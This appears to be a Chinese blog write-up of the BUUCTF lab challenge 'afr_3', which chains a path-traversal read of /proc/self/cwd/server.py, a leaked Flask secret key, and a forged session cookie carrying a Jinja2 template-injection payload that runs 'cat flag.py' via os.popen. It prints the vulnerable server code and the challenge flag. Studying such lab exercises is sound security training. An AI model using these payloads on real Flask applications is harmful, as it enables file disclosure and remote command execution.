[第一章 web入门]afr_3

shierbai2024-11-09 19:49

会做拦截

不存在的文件报错不同

不同目录也是输flag会出现,猜测有黑名单

这里解码猜测是通过鉴权来的

要伪造ssesion,这里卡住

buuctf 刷题记录 [第一章 web入门]afr_3 - MuRKuo - 博客园

得知这里涉及ssit注入和flask模板注入,但是不理解怎么识别出来的

利用文中提及的poc

../../../../proc/self/cwd/server.py

Drmhze6EPcv0fN_81Bj-nA

然后使用GitCode - 全球开发者的开源社区,开源代码托管平台

flask_session_cookie_manager3伪造cookie

对应ssit代码{``{''.__class__.__mro__[2].__subclasses__()[40]('flag.py').read()}}

详情见最开始的链接,简单来说就是利用文件包含

python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.class.mro[2].subclasses()[71].init.globals[\'os\'].popen(\'cat flag.py\').read()}}'}"

-s 指的是加密密钥

-t 指的是加密密文(ssti)

这样在后续才可以完成文件包含,这里伪造cookie是为了执行里面的代码,不是单纯的绕过认证,这里不加cookie会默认让cookie为n1code,至于后面那个/article接口只是在有flag字样时候展示notallow.txt,并不能完成攻击得到flag

不仔细读就踩坑

复制代码 
#!/usr/bin/python
import os
from flask import (Flask, render_template, request, url_for, redirect, session, render_template_string)
from flask_session import Session

app = Flask(__name__)
execfile('flag.py')
execfile('key.py')
FLAG = flag
app.secret_key = key

@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    
    n1code = request.form.get("n1code") or None
    
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{", "").replace("}", "")
    
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code

    template = None
    if session['n1code'] is not None:
        template = '''<h1>N1 Page</h1>
        <div class="row">
            <div class="col-md-6 col-md-offset-3 center">
                Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>?
            </div>
        </div>''' % session['n1code']
        
        session['n1code'] = None
    
    return render_template_string(template)

@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")

@app.route('/article', methods=['GET'])
def article():
    error = 0
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = 'article'
    
    if page.find('flag') >= 0:
        page = 'notallowed.txt'
    
    try:
        template = open('/home/nu11111111l/articles/{}'.format(page)).read()
    except Exception as e:
        template = e
    
    return render_template('article.html', template=template)

if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=False)

要在这个路由下完成操作

'n1book{afr_3_solved}'

相关推荐
安全系统学习1 小时前
【网络安全】Mysql注入中锁机制
安全·web安全·网络安全·渗透测试·xss
缘友一世13 小时前
网安系列【4】之OWASP与OWASP Top 10:Web安全入门指南
安全·web安全
安全系统学习1 天前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
聚铭网络1 天前
案例精选 | 某省级税务局AI大数据日志审计中台应用实践
大数据·人工智能·web安全
GLAB-Mary1 天前
AI会取代网络工程师吗?理解AI在网络安全中的角色
网络·人工智能·web安全
galaxylove1 天前
Gartner发布最新指南:企业要构建防御性强且敏捷的网络安全计划以平衡安全保障与业务运营
网络·安全·web安全
学习溢出2 天前
【网络安全】持续监控CI/CD:自动发现威胁与IoCs,软件供应链安全
运维·安全·web安全·网络安全·ci/cd
mooyuan天天2 天前
DVWA靶场通关笔记-文件上传(Medium级别)
web安全·文件上传·文件上传漏洞·dvwa靶场·文件上传mime
速盾cdn2 天前
速盾:高防CDN还有哪些冷知识?
网络·web安全
m0_738120722 天前
玄机——某学校系统中挖矿病毒应急排查
网络·安全·web安全
热门推荐
012024年 最新 iPhone手机 历代机型、屏幕尺寸、纵横比、分辨率 整理02Coze实战第13讲:飞书多维表格读取+豆包生图模型,轻松批量生成短剧封面03Coze扣子平台完整体验和实践(附国内和国际版对比)04华为昇腾 910B 部署 DeepSeek-R1 蒸馏系列模型详细指南05手机电脑之间快速传输图片视频文件,不压缩画质、不限制大小的方法!06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07Coze平台 创建AI智能体的详细步骤指南08免费可用!最强AI数字人对口型神器:让照片开口说话唱歌,支持多人对口型+全身动作,1分钟学会!(附保姆级教程)09DeepSeek各版本说明与优缺点分析10Coze(扣子)智能体工作流:自动批量生成书单号视频,1分钟100个,书单号博主都在用!